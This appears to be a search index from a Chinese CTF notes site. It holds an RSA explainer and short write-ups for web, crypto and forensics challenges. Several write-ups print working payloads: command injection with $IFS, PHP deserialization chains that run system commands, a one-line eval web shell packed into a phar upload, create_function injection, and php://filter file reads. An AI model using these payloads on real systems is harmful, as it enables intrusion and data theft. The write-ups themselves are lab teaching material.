    \u4f7f\u7528burp\u6293\u5305 \u7136\u540esend \u5230 repeater\u4e2d \u5728repeater\u4e2d\u4fee\u6539\u4e3aWLLM

    \u5f97\u5230

    \u63d0\u793a\u6709\u4e2aa.php

    \u89e3\u9664\u62e6\u622a\u540e\u8fdb\u5165\u5230a.php

    \u8981\u5c06\u5730\u5740\u6539\u4e3a\u672c\u5730\u7684\u56de\u73af\u5730\u5740\uff0c\u4e5f\u5c31\u662f127.0.0.1

    \u4f7f\u7528fakeip\u63d2\u4ef6\u8fdb\u884c\u4fee\u6539ip

    \u663e\u793asuccess\uff0c\u5e76\u53d1\u73b0secretttt.php

    \u8fdb\u5165\u5230secretttt.php \u5f97\u5230flag

    ","tags":["\u7b2c\u4e00\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/","title":"RSA\u7b97\u6cd5\u539f\u7406","text":"

    \u672c\u6587\u501f\u9274\u4e86https://en.wikipedia.org/wiki/RSA_(cryptosystem) \u4e2d\u7684\u8d44\u6599\u548c\u4e9b\u56fe\u7247

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#rsa_1","title":"\u4e00\u3001RSA\u52a0\u5bc6\u8fc7\u7a0b\uff1a","text":"","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#1rsa","title":"\uff081\uff09RSA\u57fa\u672c\u539f\u5219\uff1a","text":"

    \u200b RSA \u80cc\u540e\u7684\u4e00\u4e2a\u57fa\u672c\u539f\u5219\u662f\u89c2\u5bdf\u5230\u627e\u5230\u4e09\u4e2a\u975e\u5e38\u5927\u7684\u6b63\u6574\u6570 e\u3001d \u548c n \u662f\u53ef\u884c\u7684\uff0c\u4f7f\u5f97\u5bf9\u6240\u6709\u6574\u6570 m\uff080 \u2264 m < n\uff09\u8fdb\u884c\u6a21\u5e42\u8fd0\u7b97\uff1a

    \u200b

    \u200b \u4e09\u6760\u8868\u793a\u6a21\u540c\u4f59\uff0c\u4e5f\u5c31\u662f\u5f53\u8c03\u6362e\u548cd\u7684\u4f4d\u7f6e\uff0c\u4f1a\u6709\u76f8\u540c\u7684\u4f59\u6570

    RSA \u6d89\u53ca\u516c\u94a5\u548c\u79c1\u94a5\u3002\u516c\u94a5\u662f\u4f17\u6240\u5468\u77e5\u7684\uff0c\u7528\u4e8e\u52a0\u5bc6\u6d88\u606f\u3002\u76ee\u7684\u662f\u4f7f\u7528\u516c\u94a5\u52a0\u5bc6\u7684\u6d88\u606f\u53ea\u80fd\u5728\u5408\u7406\u7684\u65f6\u95f4\u5185\u4f7f\u7528\u79c1\u94a5\u89e3\u5bc6\u3002\u516c\u94a5\u7531\u6574\u6570n\u548ce\u8868\u793a\uff0c\u79c1\u94a5\u7531\u6574\u6570d\u8868\u793a\uff08\u5c3d\u7ba1\u5728\u89e3\u5bc6\u8fc7\u7a0b\u4e2d\u4e5f\u4f1a\u4f7f\u7528n\uff0c\u56e0\u6b64\u5b83\u4e5f\u53ef\u80fd\u88ab\u8ba4\u4e3a\u662f\u79c1\u94a5\u7684\u4e00\u90e8\u5206\uff09\u3002m\u4ee3\u8868\u6d88\u606f\u3002

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#2","title":"\uff082\uff09\u5bc6\u94a5\u751f\u6210\uff1a","text":"

    RSA\u7b97\u6cd5\u7684\u5bc6\u94a5\u4ee5\u4e0b\u65b9\u5f0f\u751f\u6210\uff1a

    1.\u9009\u62e9\u4e24\u4e2a\u76f8\u5dee\u5927\u7684\u5927\u8d28\u6570 p \u548c q

    \u200b \u4e3a\u4e86\u4f7f\u5f97\u56e0\u5f0f\u5206\u89e3\u66f4\u96be\uff0cp\u548cq\u8981\u968f\u673a\u9009\u62e9\uff1a\u4e3a\u4e86\u9009\u62e9\u5b83\u4eec\uff0c\u6807\u51c6\u65b9\u6cd5\u662f\u9009\u62e9\u968f\u673a\u6574\u6570\u5e76\u4f7f\u7528\u7d20\u6570\u6d4b\u8bd5\uff0c\u76f4\u5230\u627e\u5230\u4e24\u4e2a\u7d20\u6570\u3002p\u548cq\u5e94\u4fdd\u5bc6

    2.\u8ba1\u7b97n

    \u200b n = p*q

    \u200b n\u4f5c\u4e3a\u516c\u94a5\u548c\u79c1\u94a5\u7684\u6a21\u6570\u3002\u5b83\u7684\u957f\u5ea6\uff0c\u901a\u5e38\u7528\u6bd4\u7279\u6765\u8868\u793a\uff0c\u5c31\u662f\u5bc6\u94a5\u957f\u5ea6

    3.\u8ba1\u7b97\u03bb ( n )

    \u5728\u6570\u8bba\u8fd9\u4e00\u6570\u5b66\u5206\u652f\u4e2d\uff0c\u6b63\u6574\u6570n\u7684Carmichael \u51fd\u6570 \u03bb ( n )\u662f\u6ee1\u8db3\u4ee5\u4e0b\u6761\u4ef6\u7684 \u6700\u5c0f\u6b63\u6574\u6570m

    \u200b \u5728\u4ee3\u6570\u672f\u8bed\u4e2d\uff0c\u03bb ( n )\u662f\u6574\u6570\u4e58\u6cd5\u7fa4\u5bf9n\u53d6\u6a21\u7684\u6307\u6570\u3002

    \u7531\u4e8en = pq , \u03bb ( n ) = lcm ( \u03bb ( p ), \u03bb ( q ))\uff0c\u5e76\u4e14\u7531\u4e8ep\u548cq\u662f\u7d20\u6570\uff0c\u56e0\u6b64\u03bb ( p ) = \u03c6 ( p ) = p \u2212 1\uff0c\u540c\u6837\u5730\u03bb ( q ) = q \u2212 1\u3002\u56e0\u6b64\u03bb( n ) = lcm( p \u2212 1, q \u2212 1)\u3002

    4.\u9009\u62e9\u4e00\u4e2a\u6574\u6570e\u4f7f\u5f972 < e < \u03bb ( n )\u548cgcd ( e , \u03bb ( n )) = 1\uff1b\u4e5f\u5c31\u662f\u8bf4\uff0ce\u548c\u03bb ( n )\u4e92\u8d28\u3002

    \u200b \u6700\u5e38\u9009\u62e9\u7684e\u503c\u662f2^16 + 1 =65537

    \u200b e\u4f5c\u4e3a\u516c\u94a5\u7684\u4e00\u90e8\u5206\u53d1\u5e03

    5.\u786e\u5b9ad

    \u200b d \u2261 e \u22121 (mod \u03bb ( n ))\uff1b\u4e5f\u5c31\u662f\u8bf4\uff0cd\u662fe\u6a21\u03bb ( n )\u7684\u6a21\u4e58\u9006

    \u200b

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#ras","title":"\u4e8c\u3001RAS\u89e3\u5bc6\u8fc7\u7a0b\uff1a","text":"

    \u200b \u901a\u8fc7\u8ba1\u7b97\u4f7f\u5f97\u79c1\u94a5\u6307\u6570\u4eced\u5230c\u6062\u590dm

    \u793a\u4f8b\uff1a

    \u200b \u4f46\u5b9e\u9645\u4f7f\u7528\u4e2d\u56fd\u4f59\u6570\u5b9a\u7406\u6765\u52a0\u901f\u56e0\u5b50\u6a21\u6570\u7684\u8ba1\u7b97\uff08mod pq \u4f7f\u7528 mod p \u548c mod q)

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_1","title":"\u4e2d\u56fd\u4f59\u6570\u7b97\u6cd5\uff1a","text":"

    \u200b

    \u200b

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_2","title":"\u7b7e\u540d\u6d88\u606f","text":"

    \u5047\u8bbe Alice \u5e0c\u671b\u5411 Bob \u53d1\u9001\u4e00\u6761\u7b7e\u540d\u6d88\u606f\u3002\u5979\u53ef\u4ee5\u4f7f\u7528\u81ea\u5df1\u7684\u79c1\u94a5\u6765\u8fd9\u6837\u505a\u3002\u5979\u751f\u6210\u6d88\u606f\u7684\u6563\u5217\u503c\uff0c\u5c06\u5176\u8ba1\u7b97\u4e3ad\u7684\u5e42\uff08\u6a21n\uff09\uff08\u5c31\u50cf\u5979\u5728\u89e3\u5bc6\u6d88\u606f\u65f6\u6240\u505a\u7684\u90a3\u6837\uff09\uff0c\u5e76\u5c06\u5176\u4f5c\u4e3a\u201c\u7b7e\u540d\u201d\u9644\u52a0\u5230\u6d88\u606f\u4e2d\u3002\u5f53 Bob \u6536\u5230\u7b7e\u540d\u6d88\u606f\u65f6\uff0c\u4ed6\u4f7f\u7528\u76f8\u540c\u7684\u54c8\u5e0c\u7b97\u6cd5\u7ed3\u5408 Alice \u7684\u516c\u94a5\u3002\u4ed6\u5bf9\u7b7e\u540d\u6c42e\u6b21\u65b9\uff08\u6a21n\uff09\uff08\u5c31\u50cf\u4ed6\u5728\u52a0\u5bc6\u6d88\u606f\u65f6\u6240\u505a\u7684\u90a3\u6837\uff09\uff0c\u5e76\u5c06\u751f\u6210\u7684\u6563\u5217\u503c\u4e0e\u6d88\u606f\u7684\u6563\u5217\u503c\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679c\u4e24\u8005\u4e00\u81f4\uff0c\u4ed6\u5c31\u77e5\u9053\u6d88\u606f\u7684\u4f5c\u8005\u62e5\u6709\u7231\u4e3d\u4e1d\u7684\u79c1\u94a5\uff0c\u5e76\u4e14\u6d88\u606f\u81ea\u53d1\u9001\u4ee5\u6765\u6ca1\u6709\u88ab\u7be1\u6539\u8fc7\u3002

    \u8fd9\u662f\u8fd0\u7528\u4e86\u6c42\u5e42\u89c4\u5219\uff1a

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_3","title":"\u8d39\u9a6c\u5c0f\u5b9a\u7406","text":"

    \u200b \u5982\u679cp\u662f\u7d20\u6570\uff0c\u5219\u5bf9\u4e8e\u4efb\u610f\u7684a\uff0c\u6570a^p-a\u662fp\u7684\u6574\u6570\u500d\u3002

    \u200b

    \u4f8b\u5982 a =2, p =7 \u5219 2^7 = 128,128-2=126=7*18 \u4e3a7\u7684\u6574\u6570\u500d

    \u5982\u679ca \u4e0d\u80fd\u88abp\u6574\u9664\uff0c\u5373\u5982\u679ca\u4e0ep\u4e92\u8d28\uff0c\u8d39\u9a6c\u5c0f\u5b9a\u7406\u7b49\u4ef7\u4e8e\uff08p^-1\uff09-1\u662fp\u7684\u6574\u6570\u500d

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_4","title":"\u603b\u7ed3\uff1a","text":"

    \u5728RSA\u5bc6\u7801\u5e94\u7528\u4e2d\uff0c\u516c\u94a5\u662f\u88ab\u516c\u5f00\u7684\uff0c\u5373e\u548cn\u7684\u6570\u503c\u662f\u53ef\u4ee5\u88ab\u5f97\u5230\u7684\u3002\u7834\u89e3RSA\u5bc6\u7801\u5c31\u662f\u4ece\u5df2\u77e5\u7684\u989d\u548cn\u6c42\u5f97d\u3002\u8fd9\u6837\u5c31\u53ef\u4ee5\u4f7f\u7528\u79c1\u94a5\u6765\u7834\u89e3\u5bc6\u6587\u4e86\u3002

    \u4f46\u5f53p\u548cq\u662f\u4e00\u4e2a\u5f88\u5927\u7684\u7d20\u6570\u65f6\uff0c\u4ecen\u53bb\u5206\u89e3\u56e0\u5b50p\u548cq\uff0c\u662f\u6570\u5b66\u754c\u516c\u8ba4\u7684\u96be\u9898\u3002

    \u56e0\u6b64\uff0c\u5728\u8fdb\u884cRSA\u52a0\u5bc6\u7684\u65f6\u5019\uff0c\u5e94\u5c3d\u91cf\u7684\u4f7f\u7528\u8db3\u591f\u5927\u7684p\u548cq\uff0c\u6765\u4fdd\u8bc1d\u4e0d\u4f1a\u88ab\u7b97\u51fa

    \u4f46\u662f\uff0cRSA\u7684\u7f3a\u70b9\u4e5f\u5f88\u660e\u663e\uff1a

    \u200b RSA\u7684\u5b89\u5168\u6027\u5b8c\u5168\u6765\u81ea\u4e8e\u56e0\u5b50\u5206\u89e3\uff0c\u7834\u8bd1RSA\u7684\u96be\u5ea6\u7b49\u4ef7\u4e8e\u5206\u89e3\u56e0\u5b50\u7684\u96be\u5ea6

    \u200b \u5bc6\u94a5\u7684\u4ea7\u751f\u5341\u5206\u9ebb\u70e6\uff0c\u53d7\u5230p\u548cq\u7684\u5f71\u54cd\uff0c\u5f88\u96be\u505a\u5230\u4e00\u6b21\u4e00\u4e2a\u5bc6\u94a5

    \u200b RSA\u9700\u8981\u66f4\u957f\u7684\u5bc6\u94a5\uff0c\u8fd9\u5c31\u4f7f\u5f97\u8fd0\u7b97\u901f\u5ea6\u8f83\u6162\u3002

    ","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/problem-1096-wp/","title":"[GXYCTF 2019]Ping Ping Ping","text":"

    \u6c99\u7bb1 $ISF9\u7ed5\u8fc7\u7a7a\u683c

    exp ?ip=localhost;a=ag;b=fl;cat$IFS$9$b$a.php

    \u7136\u540eF12\u770b\u5c31\u80fd\u770b\u5230\u4e86~~\u624d\u4e0d\u4f1a\u8bf4\u56e0\u4e3a\u8fd9\u4e2a\u5361\u4e86\u591a\u4e45~~

    "},{"location":"ctfnotes/problem-1852-wp/","title":"[NISACTF 2022]babyserialize","text":"
    1. \u5ba1\u8ba1\u6e90\u7801
    2. \u6784\u5efapop\u94fe
    NISA.__invoke()\n=>Ilovetxw.__toString()\n    =>four.__set(fun,\"sixsixsix\")\n        =>Ilovetxw.__call(nisa,\"sixsixsix\")\n            =>TianXiWei.__wakeup()\n
    1. \u5199exp
    <?php\n\nclass NISA\n{\n    public $fun = \"show_me_fla\";\n    public $txw4ever;\n    public function __wakeup()\n    {\n        if ($this->fun == \"show_me_flag\") {\n            hint();\n        }\n    }\n    function __call($from, $val)\n    {\n        $this->fun = $val[0];\n    }\n\n    public function __toString()\n    {\n        echo $this->fun;\n        return \" \";\n    }\n    public function __invoke()\n    {\n        checkcheck($this->txw4ever);\n        @eval($this->txw4ever);\n    }\n}\n\nclass TianXiWei\n{\n    public $ext;\n    public $x;\n    public function __wakeup()\n    {\n        $this->ext->nisa($this->x);\n    }\n}\n\nclass Ilovetxw\n{\n    public $huang;\n    public $su;\n    public function __call($fun1, $arg)\n    {\n        $this->huang->fun = $arg[0];\n    }\n\n    public function __toString()\n    {\n        $bb = $this->su;\n        return $bb();\n    }\n}\n\nclass four\n{\n    public $a = \"TXW4EVER\";\n    private $fun = 'abc';\n    public function __set($name, $value)\n    {\n        $this->$name = $value;\n        if ($this->fun = \"sixsixsix\") {\n            strtolower($this->a);\n        }\n    }\n}\n\n$a = new NISA;\n$b = new Ilovetxw;\n$c = new four;\n$d = new Ilovetxw;\n$f = new TianXiWei;\n//\n//$a->txw4ever = 'SYSTEM(\"ls /\");';\n$a->txw4ever = 'SYSTEM(\"cat /fllllllaaag\");';\n$b->su = $a;\n$c->a = $b;\n$d->huang = $c;\n$f->x = \"sixsixsix\";\n$f->ext = $d;\n\necho urlencode(serialize($f));\n//\n\n

    \u5f97\u5230flag

    "},{"location":"ctfnotes/problem-2026-wp/","title":"[NISACTF 2022]bingdundun~","text":"

    phar \u4e0a\u4f20\u7136\u540ephar\u4f2a\u534f\u8bae\u8bbf\u95ee

    \n//pchar.php\n<?php\n$phar = new Phar('exp.phar');   //\n$phar->buildFromDirectory('./exp');//buildFromDirectory\u6307\u5b9a\u538b\u7f29\u7684\u76ee\u5f55\n$phar->compressFiles(Phar::GZ);  //Phar::GZ\u8868\u793a\u4f7f\u7528gzip\u6765\u538b\u7f29\u6b64\u6587\u4ef6\n$phar->stopBuffering();\n$phar->setStub($phar->createDefaultStub('exp.php'));//setSub\u7528\u6765\u8bbe\u7f6e\u542f\u52a8\u52a0\u8f7d\u7684\u6587\u4ef6\n?>\n//exp/exp.php\n<?php\n@eval($_POST['shell']);\n?>\n

    \u6700\u540e\u8681\u5251\u8bbf\u95ee \u5bc6\u7801shell ?bingdundun=phar://./upload_name/exp

    flag\u5c31\u5728/flag\u91cc

    "},{"location":"ctfnotes/problem-2036-wp/","title":"[NISACTF 2022]level-up","text":"
    1. level-1 \u8fdb\u5165\u5199\u7740nothing here F12\u53d1\u73b0\u5199\u7740disallow \u63a8\u6d4brobots.txt \u8bbf\u95ee\u5373\u83b7\u5f97level 2\u5730\u5740
    2. level-2 php md5 \u5f3a\u78b0\u649e post array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2 &array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2 \u89e3\u51b3 \u5f97\u5230level 3\u5730\u5740
    3. level-3 php sha1 \u5f3a\u78b0\u649e post array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1 &array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1 \u5f97\u5230level-4\u5730\u5740
    4. level-4 php\u53d8\u91cf\u89e3\u6790\u7ed5\u8fc7 \u4f7f\u7528GET NI+SA+=txw4ever \u5f97\u5230level5\u5730\u5740
    5. level-5 createfunction\u7ed5\u8fc7 exp ?a=\\create_function&b=return%200;}var_dump(system(\"cat%20/flag\"));/* \u5f97\u5230flag
    "},{"location":"ctfnotes/problem-2049-wp/","title":"[NISACTF 2022]huaji?","text":"
    1. binwalk\u5206\u6790 \u5f97\u5230\u5185\u90e8\u6709\u4e2a\u538b\u7f29\u5305 \u52a0\u5bc6\u4e86 \u5728\u539f\u56fe\u5927\u7a7a\u767d\u5904\u627e\u5230 \u4e24\u6bb5 6374665f4e4953415f32303232 6e6973615f32303232 hex\u7f16\u7801\u5f97 ctf_NISA_2022 \u548cnisa_2022 \u6210\u529f\u89e3\u538b\u538b\u7f29\u5305\u5f97\u5230flag
    "},{"location":"ctfnotes/problem-2074-wp/","title":"[NSSCTF 2022 Spring Recruit]ezgame","text":"

    F12\u5206\u6790\u5373\u62ffflag\u5728./js/preload.js\u91cc

    "},{"location":"ctfnotes/problem-2076-wp/","title":"[NSSCTF 2022 Spring Recruit]babyphp","text":"
    1. \u7b2c\u4e00\u5c42\u975e\u7a7a\u6570\u7ec4\u7ed5\u8fc7 post a[]=[1]
    2. \u975e\u7a7a\u7a7a\u6570\u7ec4MD5 post b1[]=[1]&b2[]=[2]
    3. MD5 \u7ed5\u8fc7 post c1=s878926199a&c2=s155964671a
    "},{"location":"ctfnotes/problem-2099-wp/","title":"[NISACTF 2022]popchains","text":"
    1. \u5ba1\u8ba1\u6e90\u7801
    2. \u6784\u5efapop\u94fe
    Try_Work_Hard.__invoke()\n    =>Make_a_change.__get\n        => Road_is_Long.__toString()\n           => Road_is_Long.__wakeup()\n
    1. \u7f16\u5199exp ~~\u6709\u574fb\u8bef\u5bfc\u6211\u6211\u4e0d\u8bf4\u662f\u8c01~~
    <?php\n\n//echo 'Happy New Year~ MAKE A WISH<br>';\n\n/***************************pop your 2022*****************************/\n\nclass Road_is_Long\n{\n    public $page;\n    public $string;\n    public function __construct($file = 'index.php')\n    {\n        $this->page = $file;\n    }\n    public function __toString()\n    {\n        return $this->string->page;\n    }\n\n    public function __wakeup()\n    {\n        if (preg_match(\"/file|ftp|http|https|gopher|dict|\\.\\./i\", $this->page)) {\n            echo \"You can Not Enter 2022\";\n            $this->page = \"index.php\";\n        }\n    }\n}\n\nclass Try_Work_Hard\n{\n    protected $var;\n    public function __construct(){\n        $this->var = \"/flag\";\n    }\n    public function append($value)\n    {\n        include($value);\n    }\n    public function __invoke()\n    {\n        $this->append($this->var);\n    }\n}\n\nclass Make_a_Change\n{\n    public $effort;\n    public function __construct()\n    {\n        $this->effort = array();\n    }\n\n    public function __get($key)\n    {\n        $function = $this->effort;\n        return $function();\n    }\n}\n\n$a = new Try_Work_Hard;\n$b = new Make_a_Change;\n$c = new Road_is_Long;\n$d = new Road_is_Long;\n\n$b->effort = $a;\n$c->string = $b;\n$d->page = $c;\necho \"?wish=\" . urlencode(serialize($d));\n
    "},{"location":"ctfnotes/problem-227-wp/","title":"[\u7f8a\u57ce\u676f 2021]Bigrsa","text":"
    1. \u5171\u4eab\u7d20\u6570 $n_1 n_2$\u6709\u4e00\u7d20\u6570\u516c\u56e0\u6570$p$ $n_1=pq_1 n_2=pq_2$ $d_1e\\equiv 1\\space mod\\space\\varphi(n_1)$ $d_2e\\equiv 1\\space mod\\space\\varphi(n_2)$ $\\therefore \u53ea\u9700\u8981\u9006\u5143\u6c42\u51fa\\frac{1}{e}\\space mod\\space \\varphi(n_1)\u548c\\frac{1}{e}\\space mod\\space \\varphi(n_2)\u5c31\u53ef\u4ee5\u5f97\u5230d_1\u548cd_2$
    2. exp
    from gmpy2 import *\nfrom Crypto.Util.number import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\np = gmpy2.gcd(n1, n2)\nq1, q2 = n1//p, n2//p\nphi_n1, phi_n2 = (p-1)*(q1-1), (p-1)*(q2-1)\nd1, d2 = inverse(e, phi_n1), inverse(e, phi_n2)\n\nm = pow(pow(c, d2, n2), d1, n1)\nprint(long_to_bytes(m).decode())\n
    "},{"location":"ctfnotes/problem-2422-wp/","title":"[\u9e4f\u57ce\u676f 2022]\u7b80\u5355\u5305\u542b","text":"
    1. \u5ba1\u8ba1\u6e90\u7801\u53d1\u73b0\u5176\u4f1ainclude'flag'\u7684\u6587\u4ef6\u8fdb\u6765
    2. \u5c1d\u8bd5post flag

    exp-fake

    flag = flag.php\n

    \u83b7\u5f97nssctf waf!

    \u5c1d\u8bd5\u83b7\u53d6flag.php

    flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php\n

    \u4ecd\u7136\u83b7\u5f97\u83b7\u5f97nssctf waf!

    \u5c1d\u8bd5\u83b7\u53d6index.php

    flag = php://filter/read=convert.base64-encode/resource=/var/www/html/index.php\n

    \u89e3\u7801\u5f97

    <?php\n\n$path = $_POST[\"flag\"];\n\nif (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {\n    echo 'nssctf waf!';\n} else {\n    @include($path);\n} ?>\n\n<code>\n<span style=\"color: #000000\">\n<span style=\"color: #0000BB\">&lt;?php&nbsp;<br />highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">__FILE__</span><span style=\"color: #007700\">);<br />include(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[</span><span style=\"color: #DD0000\">\"flag\"</span><span style=\"color: #007700\">]);<br /></span><span style=\"color: #FF8000\">//flag&nbsp;in&nbsp;/var/www/html/flag.php;</span>\n</span>\n</code><br />\n\n

    \u5f97\u77e5\u53ef\u4ee5\u901a\u8fc7post\u8d85\u957f\u7684request\u6765\u7ed5\u8fc7 \u6240\u4ee5 exp

    a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php\n

    \u89e3\u7801\u5373\u83b7\u5f97flag

    "},{"location":"ctfnotes/problem-2602-wp/","title":"[HUBUCTF 2022 \u65b0\u751f\u8d5b]checkin","text":"
    1. \u5ba1\u8ba1\u6e90\u7801 \u53d1\u73b0\u4f7f\u7528 ==
    2. \u5199exp
    <?php \n$data_unserialize = [\"username\"=>true,\"password\"=>true];\necho \"?info=\"urlencode(serialize(($data_unserialize)));\n

    \u4f20\u5165\u5373\u5f97

    "},{"location":"ctfnotes/problem-39-wp/","title":"[SWPU 2019]\u795e\u5947\u7684\u4e8c\u7ef4\u7801","text":"
    1. binwalk \u5206\u6790 \u53d1\u73b0\u91cc\u9762\u67094\u4e2a\u538b\u7f29\u5305 binwalk -b \u89e3\u5f00 \u5f97\u5230flag.doc,flag.jpg,encode.txt,good.rar 4\u4e2a\u4e3b\u8981\u6587\u4ef6
    2. \u5bf9flag.doc\u5185\u90e8\u5185\u5bb9\u89e3\u7801 \u5f97\u5230 comEON_YOuAreSOSoS0great \u8fd9\u4e2a\u5c31\u662fgood.rar\u7684\u89e3\u538b\u5bc6\u7801 \u89e3\u5f00good.rar\u5f97\u5230good.mp3
    3. \u542c\u4e00\u4e0b\u4e3a\u6469\u65af\u7535\u7801 Audacity \u53ef\u89c6\u5316 \u5728\u7ebf\u89e3\u7801\u4e0b\u5f97\u5230flag
    "},{"location":"ctfnotes/problem-403-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]\u7b80\u7b80\u5355\u5355\u7684\u903b\u8f91","text":"
    1. \u5ba1\u8ba1\u6e90\u7801 \u56e0\u4e3a\u5f02\u6216\u7684\u9006\u8fd0\u7b97\u5c31\u662f\u5f02\u6216 \u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u7f16\u5199exp
    2. \u7f16\u5199exp
    def decode(cipher):\n    flag = ''\n    for i in range(len(list)):\n        key = (list[i]>>4)+((list[i] & 0xf)<<4)\n        now = cipher[2*i:2*i+2]\n        print(now)\n        now = int(now,16)\n        print(now)\n        now^=key\n        flag+=chr(now)\n    print(flag)\ndecode(result)\n
